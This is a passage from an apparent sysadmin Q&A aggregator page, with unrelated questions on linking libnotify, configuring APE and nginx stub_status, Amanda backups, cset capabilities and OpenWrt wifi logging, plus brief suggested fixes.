        g++ -o shell -m32 shell.o -L../v8 -lv8 -lpthread `pkg-config --libs libnotify glib-2.0`
        /usr/bin/ld: skipping incompatible /usr/lib/gcc/x86_64-linux-gnu/4.4.3/../../../libnotify.so when searching for -lnotify
        /usr/bin/ld: skipping incompatible /usr/lib/gcc/x86_64-linux-gnu/4.4.3/../../../libnotify.a when searching for -lnotify
        /usr/bin/ld: skipping incompatible /usr/lib/libnotify.so when searching for -lnotify
        /usr/bin/ld: skipping incompatible /usr/lib/libnotify.a when searching for -lnotify
        /usr/bin/ld: cannot find -lnotify
        collect2: ld returned 1 exit status

    Thanks!
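
    On pre-multiarch Ubuntu releases, one hedged workaround (my sketch; the .deb file name is an example - fetch the i386 libnotify package matching your release from packages.ubuntu.com) is to unpack the 32-bit package into a private lib directory and link against it:

        # unpack the i386 build of the library locally
        dpkg -x libnotify1_*_i386.deb ~/lib32
        # the runtime package only ships libnotify.so.1, so give the linker a .so symlink
        ln -s ~/lib32/usr/lib/libnotify.so.1 ~/lib32/usr/lib/libnotify.so
        # then point the link step at it
        g++ -m32 -o shell shell.o -L../v8 -L$HOME/lib32/usr/lib -lv8 -lnotify -lpthread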

    Read the article

  • Configure APE-Server on Ubuntu 10.10 webserver

    - by sadmicrowave
    I'm having problems configuring my APE server. First, I reside behind a corporate firewall where our own DNS servers are maintained. I requested a domain name for my server and was provided uslonsweb003.us.mycompany.com by my IT group. Therefore my website works and can be accessed (intranet only) at http://uslonsweb003.us.mycompany.com/test.php.

    I followed the instructions at ape-project.org and ran the Check Tool at the end, only to get an error stating:

        Running test : Contacting APE Server (adding frequency)
        Can't contact APE Server. Please check the folowing url is pointing to your APE server : http://0.uslonsweb003.us.mycompany.com:6969

    My /etc/apache2/apache2.conf section looks as follows:

        <VirtualHost *:80>
            Servername uslonsweb003.us.mycompany.com
            ServerAlias ape.uslonsweb003.us.mycompany.com
            ServerAlias *.ape.uslonsweb003.us.mycompany.com
            DocumentRoot "/var/www/"
        </VirtualHost>

    My /var/www/ape-jsf/Demos/config.js config section looks as follows:

        APE.Config.baseUrl = 'http://uslonsweb003.us.mycompany.com/ape-jsf';
        APE.Config.domain = 'uslonsweb003.us.mycompany.com';
        APE.Config.server = 'uslonsweb003.us.mycompany.com:6969';

    The instructions at ape-project.org tell me that APE.Config.server should be `ape.mydomain.com:6969'; but that does not work (I'm assuming because my corporate DNS does not understand the 'ape' prefix before the domain name, since 'ape' was not registered with the IT DNS). So I changed it to what you see above. Please help!! Thanks in advance

    UPDATE 1

    Per the installation instructions located at http://www.ape-project.org/wiki/index.php/Advanced_APE_configuration under 'Configure your Server/Computer' (I'm running it on a server, obviously), it says I need to add some lines to my DNS config file. It sounds like (since I'm within a corporate network) I would ask my IT group to add the following lines to the DNS configuration file on their end:

        ape   IN A     x.x.x.x ; IP address of my APE server
        *.ape IN CNAME ape

    I just want to make sure this is all I have to have them add (or whether this is even correct) before I ask them.

    Read the article

  • XAMPP with PostgreSQL

    - by fred smith
    I'm looking for a package like XAMPP, but instead of MySQL it would use PostgreSQL. I've done some searching and haven't turned up anything other than doing a full server setup of both.

    Read the article

  • nginx with stub_status - need help with nginx.conf

    - by Amar
    Hello, I am trying to set up nginx with stub_status so I can monitor nginx requests etc. with serverdensity.com. I needed to put something like this in nginx.conf:

        server {
            listen 82.113.147.xxx;
            location /nginx_status {
                stub_status on;
                access_log off;
                allow 82.113.147.xxx;
                deny all;
            }
        }

    And with this, monitoring actually works. However, it seems I lost the "include" part of my nginx.conf, and now none of the vhosts in sites-enabled work. Here is a bit more of my nginx.conf:

        http {
            include /etc/nginx/mime.types;
            default_type application/octet-stream;
            server_tokens off;
            access_log /var/log/nginx/access.log;
            sendfile on;
            #tcp_nopush on;
            #keepalive_timeout 0;
            keepalive_timeout 65;
            tcp_nodelay on;
            gzip on;
            gzip_comp_level 2;
            gzip_proxied any;
            gzip_types text/plain text/css application/x-javascript text/xml application/xml application/xml+rss text/javascript;
            include /etc/nginx/conf.d/*.conf;
            include /etc/nginx/sites-enabled/*;
            server {
                listen 82.113.147.226;
                location /nginx_status {
                    stub_status on;
                    access_log off;
                    allow 82.113.147.226;
                    deny all;
                }
            }
        }

    I hope someone can help me with this, as I believe it's a minor issue - it's just that I don't see it. Thanks
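
    A hedged observation (mine, not the article's): nginx picks the server block whose listen directive matches the request's address most specifically, so a block listening on 82.113.147.226 wins over sites-enabled vhosts that listen on a wildcard, and the status block added here may be swallowing all traffic to that IP. A sketch of confining it to a separate port (the port number is an example); alternatively, the /nginx_status location can simply be placed inside one of the existing vhost server blocks:

        server {
            listen 82.113.147.226:8080;   # a separate port just for the status endpoint
            location /nginx_status {
                stub_status on;
                access_log off;
                allow 127.0.0.1;
                allow 82.113.147.226;
                deny all;
            }
        }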

    Read the article

  • amanda backup problem

    - by hossam alkhalili
    Hello, I installed Amanda on CentOS 5.5 to back up Windows 7 and Windows Server 2008 over the network, and I used the 15-minute installation guide. But when I type amcheck DailySet1 I get "request failed". If I then run amservice under the amandabackup account to pin down the problem, I get "Permission denied", and under the root account I get "OPTIONS features=ff7fffff9cfeffffd3cf1300;". I use ZWC on Windows 7 as the agent. Can anyone help me? Thanks

        -sh-3.2$ amcheck DailySet1
        Amanda Tape Server Host Check
        Holding disk /dumps/amanda: 1791315968 KB disk space available, using 1791213568 KB
        slot 1: volume 'DailySet1-01'
        Will write to volume 'DailySet1-01' in slot 1.
        NOTE: skipping tape-writable test
        NOTE: conf info dir /etc/amanda/DailySet1/curinfo does not exist
        NOTE: it will be created on the next run.
        NOTE: index dir /etc/amanda/DailySet1/index does not exist
        NOTE: it will be created on the next run.
        Server check took 0.880 seconds

        Amanda Backup Client Hosts Check
        WARNING: jrcbs01.jrc.local: selfcheck request failed: Connection refused
        Client check: 1 host checked in 10.020 seconds. 1 problem found.

        amservice 192.168.1.1 bsdtcp noop
        [root@jrcbs01 ~]# amservice 192.168.1.5 bsdtcp noop
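
    A hedged note (my reading of the output above): "selfcheck request failed: Connection refused" usually means the client agent is not listening on the Amanda port, or a firewall is blocking it, rather than an authentication problem. A sketch of checking reachability from the server (10080/tcp is the standard amanda port; the address below is the one used in the question):

        # is the ZWC client reachable on the Amanda port?
        telnet 192.168.1.5 10080
        # or: nmap -p 10080 192.168.1.5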

    Read the article

  • cset as non-root to set cpu affinity for running processes

    - by RaveTheTadpole
    I've been playing with cset to set CPU affinity for running processes. I'm recreating the built-in "shield" function manually with set and proc, to add some subsets for specific threads of my application. I have a bash script that calls cset to create the sets and move the correct threads into the correct sets. It works when run with sudo.

    Now I'd like to make this script executable by another user who does not have sudo powers. I trust this user enough to be responsible with cset, but I don't want to open up the wide powers of root. I thought that CAP_SYS_NICE (which is needed for sched_setaffinity, which I assume cset must use) on the script would be sufficient, but that didn't work. I tried extending CAP_SYS_NICE to the cset program (which is a thin Python wrapper around the cset Python library). No dice.

    The output of cap_to_text on my CAP_SYS_NICE'd scripts is "=cap_ipc_lock,cap_sys_nice,cap_sys_resource+eip" (it has ipc_lock and sys_resource for other reasons; I think only sys_nice is relevant). Any ideas?
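
    One detail worth knowing (general Linux behaviour, not from the question): file capabilities set on an interpreted script are not honoured, because it is the interpreter that gets executed, much like setuid on scripts; and cpusets are manipulated through the cpuset filesystem, which needs write permission rather than CAP_SYS_NICE. A hedged fallback is a narrowly scoped sudoers rule for just this script (username and path are placeholders):

        # /etc/sudoers.d/cset (sketch)
        someuser ALL=(root) NOPASSWD: /usr/local/bin/shield-setup.sh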

    Read the article

  • OpenWrt logging: how to find out "wifi deauthentication"

    - by user62367
    If someone starts to use the wifi, I can see it with logread:

        Jan 23 21:04:47 router daemon.info hostapd: wlan0: STA XX:XX:XX:XX:XX:XX IEEE 802.11: authenticated

    But how can I see that they are disconnecting? There is no "deauthenticated" line in logread, or anything else that indicates someone got disconnected. I tried searching (e.g. http://wiki.openwrt.org/doc/uci/system), but that page doesn't cover log levels. Can anyone help me find out how to tell when someone disconnects their wifi from the router? logread doesn't even write a line when someone disconnects. Please help! It's important! Thank you!
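
    A hedged workaround (my suggestion, not from the question; wlan0 is taken from the log line above): instead of relying on hostapd's syslog output, poll the list of associated stations and diff it over time - a client that vanishes from the list has disconnected.

        # list currently associated clients; run periodically (e.g. from cron) and compare
        iw dev wlan0 station dump | awk '/^Station/ {print $2}'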

    Read the article
